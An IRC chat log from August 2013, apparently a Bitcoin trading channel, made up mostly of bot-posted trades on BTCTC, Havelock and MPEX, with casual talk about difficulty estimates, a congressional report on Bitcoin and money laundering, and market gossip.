BTC [-] Aug 13 13:17:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.04062 = 0.1625 BTC [-] Aug 13 13:17:42 [BTCTC] [TAT.ASICMINER] 29 @ 0.04061 = 1.1777 BTC [-] Aug 13 13:18:58 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Aug 13 13:19:41 [MPEX] [S.MPOE] 12929 @ 0.00083606 = 10.8094 BTC [+] Aug 13 13:19:42 [MPEX] [S.MPOE] 9361 @ 0.00083698 = 7.835 BTC [+] Aug 13 13:19:54 [MPEX] [S.MPOE] 13200 @ 0.00083891 = 11.0736 BTC [+] Aug 13 13:22:59 [BTCTC] [ACTIVEMINING] 30 @ 0.005732 = 0.172 BTC [-] Aug 13 13:23:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005732 = 0.172 BTC [-] Aug 13 13:23:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005731 = 0.2866 BTC [-] Aug 13 13:23:36 [BTCTC] [ACTIVEMINING] 2 @ 0.00571 = 0.0114 BTC [-] Aug 13 13:23:37 [BTCTC] [ACTIVEMINING] 10 @ 0.005661 = 0.0566 BTC [-] Aug 13 13:23:38 [BTCTC] [ACTIVEMINING] 50 @ 0.00566 = 0.283 BTC [-] Aug 13 13:23:40 [BTCTC] [ACTIVEMINING] 8 @ 0.005651 = 0.0452 BTC [-] Aug 13 13:23:41 [BTCTC] [ACTIVEMINING] 43 @ 0.00565 = 0.243 BTC [-] Aug 13 13:23:42 [BTCTC] [ACTIVEMINING] 173 @ 0.005633 = 0.9745 BTC [-] Aug 13 13:23:42 [BTCTC] [ACTIVEMINING] 38 @ 0.005632 = 0.214 BTC [-] Aug 13 13:24:12 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001099 = 0.0033 BTC [-] Aug 13 13:24:50 [BTCTC] [TAT.ASICMINER] 33 @ 0.04177 = 1.3784 BTC [+] Aug 13 13:24:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.04178 = 2.089 BTC [+] Aug 13 13:24:52 [BTCTC] [TAT.ASICMINER] 117 @ 0.0418 = 4.8906 BTC [+] Aug 13 13:24:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.04249 = 0.2125 BTC [+] Aug 13 13:24:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.0425 = 1.0625 BTC [+] Aug 13 13:24:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.04279 = 0.1284 BTC [+] Aug 13 13:24:57 [BTCTC] [TAT.ASICMINER] 16 @ 0.0428 = 0.6848 BTC [+] Aug 13 13:24:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0429 BTC [+] Aug 13 13:24:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.04295 = 0.4295 BTC [+] Aug 13 13:24:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.04296 = 0.6444 BTC [+] Aug 13 13:25:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.04298 = 0.4298 BTC [+] Aug 13 13:25:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.04298 = 1.0745 BTC [+] Aug 13 13:25:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.04299 = 0.215 BTC [+] Aug 13 13:25:03 [BTCTC] [TAT.ASICMINER] 20 @ 0.04299 = 0.8598 BTC [+] Aug 13 13:25:04 [BTCTC] [TAT.ASICMINER] 68 @ 0.043 = 2.924 BTC [+] Aug 13 13:25:05 [BTCTC] [TAT.ASICMINER] 39 @ 0.043 = 1.677 BTC [+] Aug 13 13:25:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.043 = 0.215 BTC [+] Aug 13 13:25:45 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 13:25:46 [BTCTC] [LABCOIN] 150 @ 0.001712 = 0.2568 BTC [-] Aug 13 13:25:47 [BTCTC] [LABCOIN] 50 @ 0.00171 = 0.0855 BTC [-] Aug 13 13:25:48 [BTCTC] [LABCOIN] 470 @ 0.001702 = 0.7999 BTC [-] Aug 13 13:27:32 .d Aug 13 13:27:33 37392766.13647 | Next Diff in 71 blocks | Estimated Change: 35.2825% in 0d 7h 39m 2s Aug 13 13:27:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Aug 13 13:29:49 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [-] Aug 13 14:00:10 ;;estimate Aug 13 14:00:10 Next difficulty estimate | None based on data since last change | 55234179.6636 based on data for last three days Aug 13 14:06:57 ;;calc 37392766.13647*1.3528 Aug 13 14:06:57 50584934.0294 Aug 13 14:06:58 can someone pls go to https://btct.co/security/ACTIVEMINING - history and tell me when the latest trade was? Aug 13 14:07:22 what are you, banned ? Aug 13 14:07:23 was it :32:49, 11x market buy? Aug 13 14:07:30 2013-08-13 11:32:49 Market Buy 11 ฿ 0.005863 ฿ 0.064493 Aug 13 14:07:35 ▲127@0.005601 Aug 13 14:07:54 um Aug 13 14:07:54 +127 is the ticker data Aug 13 14:08:04 it says "last". Aug 13 14:08:05 twas from history Aug 13 14:08:16 yea jurov Aug 13 14:08:34 but 127@0.005601 was from the realtime tab/overview Aug 13 14:08:58 so there's a delay ? Aug 13 14:09:35 there is :( Aug 13 14:09:40 and i think since yesterday Aug 13 14:10:29 burnside pls Aug 13 14:12:41 is the "last" an older trade ? Aug 13 14:12:50 or doesn't it exist in the history at all ? Aug 13 14:13:25 prolly. cannot find 5601 in history Aug 13 14:14:40 lol k. Aug 13 14:15:29 13:23 [BTCTC] [ACTIVEMINING] 38 @ 0.005632 = 0.214 BTC [-] is what came here last Aug 13 14:15:47 notably it doesn't match either the last or jurov's above Aug 13 14:16:13 how long is that ago? Aug 13 14:16:18 we have different timezones :) Aug 13 14:16:33 it's 11:23 UTC Aug 13 14:16:55 almost 2hrs ago Aug 13 14:17:13 the 13:23 was a little under an hour ago. 14:16 now Aug 13 14:17:32 lol yes, i'm confused Aug 13 14:17:47 http://bitbet.us/bet/508/btc-network-difficulty-to-top-500mn-before-xmas/ Aug 13 14:17:52 i can;'t believe that shit has even odds. Aug 13 14:17:52 BitBet - BTC network difficulty to top 500MN before Xmas 2013 Aug 13 14:18:01 fucking hell if diff is half a BILLION this year... Aug 13 14:18:39 ;;calc 50*1.2^9 Aug 13 14:18:39 Error: Something in there wasn't a valid number. Aug 13 14:18:48 ;;calc 50*(1.2**9) Aug 13 14:18:49 257.9890176 Aug 13 14:19:08 9 diff changes, 20% each Aug 13 14:19:13 i wonder if ** has precedence Aug 13 14:19:16 ;;calc 50*(1.3**11) Aug 13 14:19:16 896.080197019 Aug 13 14:19:22 ;;calc 50*1.2**9 Aug 13 14:19:22 257.9890176 Aug 13 14:19:26 hah Aug 13 14:20:20 as a code i'm parentheses-paranoid Aug 13 14:20:22 *coder Aug 13 14:20:26 hehe Aug 13 14:21:03 jurov suppose there's two consecutive 400% blowouts Aug 13 14:21:20 because up revision is capped Aug 13 14:21:32 ( Aug 13 14:21:33 someone will shit brix...or asics Aug 13 14:22:30 ) Aug 13 14:22:36 i had to close random_cat's sorry. Aug 13 14:27:22 {[[[{[( Aug 13 14:31:40 shit brix || asics Aug 13 14:39:11 is there existing public bot for BTCT? Aug 13 14:51:18 not that i know of Aug 13 14:51:52 i know guys running them but didnt see any public Aug 13 14:58:21 waow Aug 13 14:59:47 morning Aug 13 15:00:07 good mornig Aug 13 15:06:26 kakobrekla was just passing by to take a look at the trainwreck? Aug 13 15:06:46 ha? Aug 13 15:06:56 gox channel Aug 13 15:06:58 lol Aug 13 15:07:08 ah no, i needed tux Aug 13 15:34:35 kakobrekla: assbot down? Aug 13 15:35:26 ya know, i felt something was off Aug 13 15:35:41 just couldnt point the finger to it Aug 13 15:36:16 [BTCTC] [LABCOIN] 4 @ 0.001786 = 0.0071 BTC [-] Aug 13 15:36:16 put your finger on the assbot. Aug 13 15:37:37 wb assbot :) Aug 13 15:39:33 [HAVELOCK] [AM1] 1 @ 4.04 BTC [-] Aug 13 15:40:01 [BTCTC] [ASICMINER-PT] 3 @ 4.189 = 12.567 BTC [+] Aug 13 15:40:02 [BTCTC] [ASICMINER-PT] 10 @ 4.194 = 41.94 BTC [+] Aug 13 15:42:22 [HAVELOCK] [SMG] 999 @ 0.0001898 = 0.1896 BTC [-] Aug 13 15:42:24 [HAVELOCK] [SMG] 999 @ 0.0001898 = 0.1896 BTC [-] Aug 13 15:42:26 [HAVELOCK] [SMG] 999 @ 0.0001898 = 0.1896 BTC [-] Aug 13 15:42:28 [HAVELOCK] [SMG] 3600 @ 0.00019 = 0.684 BTC [+] Aug 13 15:42:54 [BTCTC] [TAT.MINIGAME] 100 @ 0.000218 = 0.0218 BTC [+] Aug 13 15:42:56 [BTCTC] [TAT.MINIGAME] 26 @ 0.000217 = 0.0056 BTC [-] Aug 13 15:42:57 [BTCTC] [TAT.MINIGAME] 500 @ 0.0002161 = 0.1081 BTC [-] Aug 13 15:42:58 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002151 = 0.2151 BTC [-] Aug 13 15:43:00 [BTCTC] [TAT.MINIGAME] 4961 @ 0.00021 = 1.0418 BTC [-] Aug 13 15:43:10 [BTCTC] [DMS.MINING] 26 @ 0.003748 = 0.0974 BTC [+] Aug 13 15:43:15 [BTCTC] [LABCOIN] 1 @ 0.001785 BTC [-] Aug 13 15:43:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0407 BTC [-] Aug 13 15:43:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.0407 = 0.407 BTC [-] Aug 13 15:43:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.04061 = 1.4214 BTC [-] Aug 13 15:43:30 [BTCTC] [TAT.ASICMINER] 30 @ 0.04053 = 1.2159 BTC [-] Aug 13 15:43:31 [BTCTC] [TAT.ASICMINER] 100 @ 0.04052 = 4.052 BTC [-] Aug 13 15:43:32 [BTCTC] [TAT.ASICMINER] 43 @ 0.04051 = 1.7419 BTC [-] Aug 13 15:43:33 [BTCTC] [TAT.ASICMINER] 61 @ 0.0405 = 2.4705 BTC [-] Aug 13 15:43:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0405 BTC [-] Aug 13 15:43:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0403 BTC [-] Aug 13 15:43:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.04023 = 0.8046 BTC [-] Aug 13 15:43:38 [BTCTC] [TAT.ASICMINER] 100 @ 0.04022 = 4.022 BTC [-] Aug 13 15:43:38 [BTCTC] [TAT.ASICMINER] 22 @ 0.04016 = 0.8835 BTC [-] Aug 13 15:43:39 [BTCTC] [TAT.ASICMINER] 24 @ 0.04015 = 0.9636 BTC [-] Aug 13 15:43:56 [BTCTC] [LABCOIN] 30 @ 0.001761 = 0.0528 BTC [-] Aug 13 15:43:57 [BTCTC] [LABCOIN] 10 @ 0.00176 = 0.0176 BTC [-] Aug 13 15:44:12 [BTCTC] [ASICMINER-PT] 2 @ 4.195 = 8.39 BTC [+] Aug 13 15:44:58 [BTCTC] [LABCOIN] 23 @ 0.001719 = 0.0395 BTC [-] Aug 13 15:45:24 [BTCTC] [BASIC-MINING] 1 @ 0.3226 BTC [+] Aug 13 15:47:58 [BTCTC] [DMS.MINING] 1 @ 0.003748 BTC [+] Aug 13 15:53:10 [BTCTC] [BTC-BOND] 13 @ 0.009998 = 0.13 BTC [+] Aug 13 15:56:09 [BTCTC] [BASIC-MINING] 1 @ 0.3219 BTC [-] Aug 13 15:56:27 [HAVELOCK] [HIM] 1 @ 0.198 BTC [+] Aug 13 15:57:54 [BTCTC] [BASIC-MINING] 1 @ 0.3218 BTC [-] Aug 13 15:59:17 [BTCTC] [BASIC-MINING] 1 @ 0.3218 BTC [-] Aug 13 16:00:29 [BTCTC] [DMS.PURCHASE] 100 @ 0.02801 = 2.801 BTC [+] Aug 13 16:04:00 "It has come to my ears that Bitstamp was sold a few days ago" - "I would kindly ask you to please contact our support for any questions you may have regarding our services. support@bitstamp.net" Aug 13 16:04:43 [BTCTC] [LABCOIN] 30 @ 0.001726 = 0.0518 BTC [+] Aug 13 16:04:43 [BTCTC] [LABCOIN] 20 @ 0.001725 = 0.0345 BTC [-] Aug 13 16:04:45 [BTCTC] [LABCOIN] 1 @ 0.001716 BTC [-] Aug 13 16:04:46 [BTCTC] [LABCOIN] 1 @ 0.001716 BTC [-] Aug 13 16:04:47 [BTCTC] [LABCOIN] 113 @ 0.001713 = 0.1936 BTC [-] Aug 13 16:04:49 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 16:06:05 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 16:06:06 [BTCTC] [LABCOIN] 250 @ 0.001712 = 0.428 BTC [-] Aug 13 16:06:08 [BTCTC] [LABCOIN] 185 @ 0.001712 = 0.3167 BTC [-] Aug 13 16:06:42 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [+] Aug 13 16:06:43 [BTCTC] [LABCOIN] 30 @ 0.001712 = 0.0514 BTC [-] Aug 13 16:06:45 [BTCTC] [LABCOIN] 66 @ 0.00171 = 0.1129 BTC [-] Aug 13 16:06:45 [BTCTC] [LABCOIN] 3 @ 0.001708 = 0.0051 BTC [-] Aug 13 16:06:46 [BTCTC] [LABCOIN] 25 @ 0.001707 = 0.0427 BTC [-] Aug 13 16:06:47 [BTCTC] [LABCOIN] 62 @ 0.001706 = 0.1058 BTC [-] Aug 13 16:06:48 [BTCTC] [LABCOIN] 500 @ 0.001705 = 0.8525 BTC [-] Aug 13 16:06:50 [BTCTC] [LABCOIN] 465 @ 0.001704 = 0.7924 BTC [-] Aug 13 16:06:51 [BTCTC] [LABCOIN] 3478 @ 0.001703 = 5.923 BTC [-] Aug 13 16:06:51 dexX7 wheres that from Aug 13 16:06:52 [MPEX] [S.MPOE] 2700 @ 0.00083403 = 2.2519 BTC [-] Aug 13 16:07:12 [BTCTC] [LABCOIN] 30 @ 0.001704 = 0.0511 BTC [+] Aug 13 16:07:13 [BTCTC] [LABCOIN] 22 @ 0.001703 = 0.0375 BTC [-] Aug 13 16:07:15 [BTCTC] [LABCOIN] 1530 @ 0.001702 = 2.6041 BTC [-] Aug 13 16:07:16 [BTCTC] [LABCOIN] 905 @ 0.001702 = 1.5403 BTC [-] Aug 13 16:07:51 [BTCTC] [LABCOIN] 30 @ 0.001703 = 0.0511 BTC [+] Aug 13 16:07:53 [BTCTC] [LABCOIN] 30 @ 0.001702 = 0.0511 BTC [-] Aug 13 16:07:54 [BTCTC] [LABCOIN] 5 @ 0.001701 = 0.0085 BTC [-] Aug 13 16:07:55 hazet pm Aug 13 16:07:55 [BTCTC] [LABCOIN] 7425 @ 0.0017 = 12.6225 BTC [-] Aug 13 16:07:56 [BTCTC] [LABCOIN] 20 @ 0.0017 = 0.034 BTC [-] Aug 13 16:08:54 i thought he was some kind of staff member/admin Aug 13 16:09:46 he is just some paid douchebag mod Aug 13 16:09:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.04137 = 0.0827 BTC [+] Aug 13 16:10:34 lol k Aug 13 16:15:59 [BTCTC] [LABCOIN] 2 @ 0.001705 = 0.0034 BTC [+] Aug 13 16:16:12 [HAVELOCK] [XBOND] 1 @ 0.00104699 BTC [+] Aug 13 16:18:03 [MPEX] [S.MPOE] 4540 @ 0.00083487 = 3.7903 BTC [+] Aug 13 16:18:06 [MPEX] [S.MPOE] 9760 @ 0.00083684 = 8.1676 BTC [+] Aug 13 16:18:14 [BTCTC] [LABCOIN] 30 @ 0.001705 = 0.0512 BTC [+] Aug 13 16:18:29 [BTCTC] [LABCOIN] 20 @ 0.001704 = 0.0341 BTC [-] Aug 13 16:23:12 [HAVELOCK] [AM100] 11 @ 0.0391 = 0.4301 BTC [+] Aug 13 16:23:14 [HAVELOCK] [AM100] 39 @ 0.0391999 = 1.5288 BTC [+] Aug 13 16:23:23 [HAVELOCK] [AM100] 1 @ 0.0391999 BTC [+] Aug 13 16:28:41 [MPEX] [S.MPOE] 13450 @ 0.00083684 = 11.2555 BTC [+] Aug 13 16:36:56 [BTCTC] [ACTIVEMINING] 30 @ 0.005611 = 0.1683 BTC [-] Aug 13 16:36:56 [BTCTC] [ACTIVEMINING] 220 @ 0.00561 = 1.2342 BTC [-] Aug 13 16:36:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.0405 = 1.0125 BTC [-] Aug 13 16:40:39 [HAVELOCK] [AM100] 2 @ 0.0391999 = 0.0784 BTC [+] Aug 13 16:43:39 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 13 16:46:15 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 13 16:50:13 [HAVELOCK] [XBOND] 12 @ 0.00104699 = 0.0126 BTC [+] Aug 13 16:50:43 [HAVELOCK] [AM100] 2 @ 0.0391999 = 0.0784 BTC [+] Aug 13 16:51:10 [HAVELOCK] [LABCO] 5 @ 0.001823 = 0.0091 BTC [+] Aug 13 16:51:23 In response to FSA’s witch hunt, Max Keiser’s Heisenberg Capital set to triple bitcoin related investments in 2013 Aug 13 16:51:23 Read more at http://www.maxkeiser.com/2013/08/tread-lightly-in-response-to-fsas-witch-hunt-max-keisers-heisenberg-capital-set-to-triple-bitcoin-related-investments-in-2013/#jmou7i7MJMX8fho7.99 Aug 13 16:51:52 sneaky, I copy/pasted a headline Aug 13 16:51:58 [HAVELOCK] [XBOND] 5 @ 0.00104699 = 0.0052 BTC [+] Aug 13 16:52:02 and it added that "read more" text Aug 13 16:55:33 Articles websites are starting to do that. Soon you'll have to have a clipboard app visible on screen at all time to make sure you're not getting something else. Like spam instead of your text. Aug 13 16:56:41 [HAVELOCK] [SDSTM] 1 @ 0.006239 BTC [+] Aug 13 16:56:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.04129 = 0.1652 BTC [+] Aug 13 16:57:39 soon we will go back to lynx Aug 13 16:57:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04129 BTC [+] Aug 13 16:58:00 lynx ftw Aug 13 16:58:30 mpex will look just fine when that happens Aug 13 16:59:11 it has like skipped this dead branch in evolution called css Aug 13 16:59:35 and js. Aug 13 17:00:25 wahahaha Aug 13 17:01:27 http://beta.congress.gov/113/crpt/hrpt171/CRPT-113hrpt171.pdf Aug 13 17:01:41 whats that Aug 13 17:01:43 "Money laundering.--The Committee understands that Bitcoins and other forms of peer-to-peer digital currency are a potential means for criminal, terrorist or other illegal organizations and individuals to illegally launder and transfer money. News reports indicate that Bitcoins may have been used to help finance the flight and activity of fugitives. The Committee directs the FBI, in Aug 13 17:01:43 consultation with the Department and other Federal partners, to provide a briefing no later 120 days after the enactment of this Act on the nature and scale of the risk posed by such ersatz currency, both in financing illegal enterprises and in undermining financial institutions. The briefing should describe the FBI efforts in the context of a coordinated Federal response to this Aug 13 17:01:44 challenge, and identify staffing and other resources devoted to this effort." Aug 13 17:01:50 heh! read that earlier Aug 13 17:02:01 Congress appropriations bill Aug 13 17:02:02 ersatz currency! Aug 13 17:02:36 hammer's gonna fall soon Aug 13 17:02:40 [HAVELOCK] [HIM] 10 @ 0.19000001 = 1.9 BTC [-] Aug 13 17:02:42 [HAVELOCK] [HIM] 16 @ 0.1899 = 3.0384 BTC [-] Aug 13 17:03:36 [BTCTC] [BASIC-MINING] 5 @ 0.3225 = 1.6125 BTC [+] Aug 13 17:04:03 [BTCTC] [ACTIVEMINING] 187 @ 0.005673 = 1.0609 BTC [+] Aug 13 17:04:41 I'm still waiting for more quotes of people suggesting to take down Bitcoin, but it seems the general public is starting to get the word about how it is. Aug 13 17:04:59 [BTCTC] [ACTIVEMINING] 685 @ 0.00561 = 3.8429 BTC [-] Aug 13 17:05:00 [BTCTC] [ACTIVEMINING] 200 @ 0.0056 = 1.12 BTC [-] Aug 13 17:05:01 [BTCTC] [ACTIVEMINING] 103 @ 0.005587 = 0.5755 BTC [-] Aug 13 17:05:02 [BTCTC] [ACTIVEMINING] 12 @ 0.005584 = 0.067 BTC [-] Aug 13 17:05:15 "News reports indicate that Bitcoins may have been used to help finance the flight and activity of fugitives." Aug 13 17:05:29 and cash is not. Aug 13 17:05:37 News reports indicate that USD may have been used to help finance the flight and activity of fugitives. Aug 13 17:05:46 +1 Aug 13 17:05:58 s/may have/has Aug 13 17:06:41 News reports indicate that the internet is still scary for old people, politicians Aug 13 17:07:06 maybe that's the takeaway here. maybe the US is displeased with the notion that their currency may be usurped as the medium for this type of activity because it lessens its global utility and value, by extension Aug 13 17:07:44 Nah, I think it's more high-level than that Aug 13 17:07:58 my opinion, anyway, is that technology always ends up winning. And that's what bitcoin is to me - a technology. Aug 13 17:08:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.04098 = 0.1229 BTC [-] Aug 13 17:08:24 [10:07] my opinion, anyway, is that technology always ends up winning. And that's what bitcoin is to me - a technology. Aug 13 17:08:25 "undermining financial institutions" that's the true issue Aug 13 17:08:33 Well I can't wait for robots with true AI Aug 13 17:08:49 TaT, yep. Aug 13 17:09:08 The Romans built roads, the British had their navy, USA had the a-bomb, and now has the almighty USD Aug 13 17:09:10 it's funny how no matter where you look, evolution happens and adaptability prevails Aug 13 17:09:16 nature, society, tech Aug 13 17:09:58 The fact that the USD is the all-backing, all-powerful unit of measure for every other currency is not lost on the government Aug 13 17:10:06 you cant build this castle of finance til it can barely stand under it's own weight, and not expect something to knock it over Aug 13 17:10:14 [HAVELOCK] [SDSTM] 4 @ 0.006239 = 0.025 BTC [+] Aug 13 17:10:25 its* Aug 13 17:10:52 Aaaugh 2% battery! Aug 13 17:11:21 http://en.wikipedia.org/wiki/Ozymandias Aug 13 17:13:12 [HAVELOCK] [XBOND] 1 @ 0.00104699 BTC [+] Aug 13 17:14:47 News reports indicate that USD may have been used to help finance the flight and activity of fugitives. Anyway, all this gov't posturing does nothing but encourage people to prepare Aug 13 17:15:00 Good Aug 13 17:15:11 I don't want Tat to go to jail :( Aug 13 17:15:37 tat will become a bad guy Aug 13 17:15:40 and dexter will take him out Aug 13 17:15:52 mpoe-pr came up with a suspiciously lucid post on this topic the other day Aug 13 17:15:53 na I see him as the next walter white Aug 13 17:16:48 so...the winklevoss twins invented a ponzi scheme and called it bitcoin? Aug 13 17:17:42 [BTCTC] [NASTY-PT] 5 @ 0.00445 = 0.0223 BTC [-] Aug 13 17:17:51 nubbins`: do you have a link? Aug 13 17:20:38 .d Aug 13 17:20:38 37392766.13647 | Next Diff in 33 blocks | Estimated Change: 35.7316% in 0d 3h 30m 57s Aug 13 17:23:36 yeah one sec Aug 13 17:24:26 https://bitcointalk.org/index.php?topic=261235.msg2904428#msg2904428 Aug 13 17:24:29 last paragraph Aug 13 17:24:31 SEC Charges Bitcoin Savings and Trust (BTCST) as Ponzi Scheme Aug 13 17:25:40 [BTCTC] [BMF] 2 @ 0.0339 = 0.0678 BTC [+] Aug 13 17:31:19 [BTCTC] [ACTIVEMINING] 20 @ 0.005584 = 0.1117 BTC [-] Aug 13 17:34:17 [BTCTC] [LABCOIN] 3 @ 0.001704 = 0.0051 BTC [-] Aug 13 17:34:19 [BTCTC] [LABCOIN] 20 @ 0.001705 = 0.0341 BTC [+] Aug 13 17:34:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.0405 = 0.2025 BTC [-] Aug 13 17:34:59 [BTCTC] [LABCOIN] 1 @ 0.001705 BTC [+] Aug 13 17:35:26 [BTCTC] [LABCOIN] 29 @ 0.001705 = 0.0494 BTC [+] Aug 13 17:36:42 [BTCTC] [ACTIVEMINING] 1 @ 0.005667 BTC [+] Aug 13 17:37:36 [BTCTC] [LABCOIN] 1 @ 0.001731 BTC [+] Aug 13 17:38:24 nice, I like it when the girl responds directly. thx nubbins` Aug 13 17:38:56 [BTCTC] [ACTIVEMINING] 10 @ 0.005637 = 0.0564 BTC [-] Aug 13 17:39:29 [HAVELOCK] [SMG] 1 @ 0.0002091 BTC [+] Aug 13 17:39:47 [BTCTC] [DMS.MINING] 15 @ 0.003746 = 0.0562 BTC [-] Aug 13 17:42:44 [BTCTC] [LABCOIN] 18 @ 0.001725 = 0.0311 BTC [-] **** BEGIN LOGGING AT Wed Aug 14 03:02:25 2013 Aug 14 03:04:08 [HAVELOCK] [SMG] 508 @ 0.0001861 = 0.0945 BTC [-] Aug 14 03:04:20 [BTCTC] [DMS.PURCHASE] 15 @ 0.028 = 0.42 BTC [+] Aug 14 03:09:01 [BTCTC] [DMS.SELLING] 218 @ 0.02423 = 5.2821 BTC [-] Aug 14 03:09:02 [BTCTC] [DMS.SELLING] 27 @ 0.02422 = 0.6539 BTC [-] Aug 14 03:09:21 [BTCTC] [LABCOIN] 30 @ 0.00155 = 0.0465 BTC [-] Aug 14 03:09:23 [BTCTC] [LABCOIN] 20 @ 0.001549 = 0.031 BTC [-] Aug 14 03:09:24 [BTCTC] [LABCOIN] 30 @ 0.001541 = 0.0462 BTC [-] Aug 14 03:09:25 [BTCTC] [LABCOIN] 12 @ 0.001506 = 0.0181 BTC [-] Aug 14 03:09:26 [BTCTC] [LABCOIN] 100 @ 0.001505 = 0.1505 BTC [-] Aug 14 03:09:27 [BTCTC] [LABCOIN] 187 @ 0.001501 = 0.2807 BTC [-] Aug 14 03:09:28 [BTCTC] [LABCOIN] 1500 @ 0.0015 = 2.25 BTC [-] Aug 14 03:09:29 [BTCTC] [LABCOIN] 1 @ 0.001491 BTC [-] Aug 14 03:09:30 [BTCTC] [LABCOIN] 10 @ 0.00149 = 0.0149 BTC [-] Aug 14 03:09:31 [BTCTC] [LABCOIN] 300 @ 0.001483 = 0.4449 BTC [-] Aug 14 03:09:32 [BTCTC] [LABCOIN] 50 @ 0.001482 = 0.0741 BTC [-] Aug 14 03:09:34 [BTCTC] [LABCOIN] 1256 @ 0.001481 = 1.8601 BTC [-] Aug 14 03:09:35 [BTCTC] [LABCOIN] 1504 @ 0.00148 = 2.2259 BTC [-] Aug 14 03:11:09 [HAVELOCK] [XBOND] 1 @ 0.0010446 BTC [+] Aug 14 03:11:48 [BTCTC] [DMS.MINING] 1 @ 0.003103 BTC [-] Aug 14 03:12:33 ;;ticker Aug 14 03:12:33 MtGox BTCUSD ticker | Best bid: 108.60502, Best ask: 108.99997, Bid-ask spread: 0.39495, Last trade: 108.60500, 24 hour volume: 17802.69784434, 24 hour low: 104.50000, 24 hour high: 109.64000, 24 hour vwap: 107.38465 Aug 14 03:14:53 [HAVELOCK] [XBOND] 1 @ 0.0010446 BTC [+] Aug 14 03:15:24 [BTCTC] [DMS.MINING] 17 @ 0.003103 = 0.0528 BTC [-] Aug 14 03:15:26 [BTCTC] [DMS.MINING] 6 @ 0.003103 = 0.0186 BTC [-] Aug 14 03:15:27 [BTCTC] [DMS.MINING] 10 @ 0.003102 = 0.031 BTC [-] Aug 14 03:15:28 [BTCTC] [DMS.MINING] 23 @ 0.003101 = 0.0713 BTC [-] Aug 14 03:15:36 [HAVELOCK] [XBOND] 1 @ 0.0010446 BTC [+] Aug 14 03:17:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0011 BTC [-] Aug 14 03:17:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00109 BTC [-] Aug 14 03:17:06 [BTCTC] [TAT.VIRTUALMINE] 98 @ 0.0009902 = 0.097 BTC [-] Aug 14 03:18:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.04014 = 0.4014 BTC [-] Aug 14 03:21:06 [BTCTC] [COG.F2] 6 @ 5 = 30 BTC Aug 14 03:21:23 [BTCTC] [COG.F2] 1 @ 5 BTC Aug 14 03:21:29 [BTCTC] [COG.F2] 3 @ 5 = 15 BTC Aug 14 03:22:47 [HAVELOCK] [SMG] 1000 @ 0.000187 = 0.187 BTC [+] Aug 14 03:23:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005475 = 0.1643 BTC [+] Aug 14 03:23:18 [BTCTC] [ACTIVEMINING] 6 @ 0.005476 = 0.0329 BTC [+] Aug 14 03:23:20 [BTCTC] [ACTIVEMINING] 13 @ 0.005482 = 0.0713 BTC [+] Aug 14 03:23:28 [BTCTC] [ACTIVEMINING] 65 @ 0.005483 = 0.3564 BTC [+] Aug 14 03:24:00 [BTCTC] [ASICMINER-PT] 1 @ 3.935 BTC [+] Aug 14 03:24:12 [BTCTC] [LABCOIN] 30 @ 0.001531 = 0.0459 BTC [+] Aug 14 03:24:31 [BTCTC] [ACTIVEMINING] 30 @ 0.00548 = 0.1644 BTC [-] Aug 14 03:24:33 [BTCTC] [ACTIVEMINING] 6 @ 0.005481 = 0.0329 BTC [+] Aug 14 03:24:34 [BTCTC] [ACTIVEMINING] 1 @ 0.005483 BTC [+] Aug 14 03:24:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005509 = 0.1377 BTC [+] Aug 14 03:24:36 [BTCTC] [ACTIVEMINING] 125 @ 0.00551 = 0.6888 BTC [+] Aug 14 03:24:37 [BTCTC] [ACTIVEMINING] 22 @ 0.00558 = 0.1228 BTC [+] Aug 14 03:24:38 [BTCTC] [ACTIVEMINING] 111 @ 0.005581 = 0.6195 BTC [+] Aug 14 03:24:39 [BTCTC] [ACTIVEMINING] 80 @ 0.005587 = 0.447 BTC [+] Aug 14 03:24:41 [BTCTC] [ACTIVEMINING] 224 @ 0.005588 = 1.2517 BTC [+] Aug 14 03:25:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005587 = 0.1676 BTC [-] Aug 14 03:25:42 [BTCTC] [ACTIVEMINING] 29 @ 0.005588 = 0.1621 BTC [+] Aug 14 03:26:02 [MPEX] [S.MPOE] 5300 @ 0.00082802 = 4.3885 BTC [+] Aug 14 03:26:04 [BTCTC] 